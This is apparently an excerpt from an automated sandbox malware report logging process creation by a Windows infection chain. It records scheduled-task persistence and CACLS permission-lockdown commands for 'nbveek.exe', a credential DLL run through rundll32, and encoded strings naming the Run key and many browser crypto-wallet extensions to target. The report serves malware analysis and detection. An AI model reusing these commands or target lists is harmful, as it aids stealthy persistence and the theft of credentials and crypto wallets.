                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb465ca805" /P "user:N"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb465ca805" /P "user:R" /E
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeProcess created: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe"
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AAE1.exe C:\Users\user\AppData\Local\Temp\AAE1.exe
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1880,i,6220591727582463305,5376783925534799791,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CEE7.exe C:\Users\user\AppData\Local\Temp\CEE7.exe
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" /F
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe" /F
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\5ca56b659f" /P "user:N"&&CACLS "..\5ca56b659f" /P "user:R" /E&&Exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6267.exe C:\Users\user\AppData\Local\Temp\6267.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\65C3.exe C:\Users\user\AppData\Local\Temp\65C3.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6D94.exe C:\Users\user\AppData\Local\Temp\6D94.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\79AB.exe C:\Users\user\AppData\Local\Temp\79AB.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7E5F.exe C:\Users\user\AppData\Local\Temp\7E5F.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C99.exe C:\Users\user\AppData\Local\Temp\8C99.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8FF5.exe C:\Users\user\AppData\Local\Temp\8FF5.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AAE1.exe C:\Users\user\AppData\Local\Temp\AAE1.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CEE7.exe C:\Users\user\AppData\Local\Temp\CEE7.exeJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" /FJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\cb465ca805" /P "user:N"&&CACLS "..\cb465ca805" /P "user:R" /E&&ExitJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, MainJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe "C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe "C:\Users\user\AppData\Local\Temp\1000014001\anon.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:N"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:R" /EJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb465ca805" /P "user:N"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb465ca805" /P "user:R" /EJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeProcess created: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\5ca56b659f" /P "user:N"&&CACLS "..\5ca56b659f" /P "user:R" /E&&Exit
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1880,i,6220591727582463305,5376783925534799791,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\5ca56b659f" /P "user:N"&&CACLS "..\5ca56b659f" /P "user:R" /E&&Exit
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6267.tmpJump to behavior
                                Source: cred64[1].dll.39.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                                Source: cred64[1].dll.39.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                                Source: cred64[1].dll.39.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                Source: cred64[1].dll.39.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                                Source: cred64[1].dll.39.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                                Source: cred64[1].dll.39.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: cred64[1].dll.39.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                Source: AAE1.exe.3.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                                Source: CEE7.exe.3.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                                Source: anon[1].exe.15.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                                Source: anon.exe.15.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
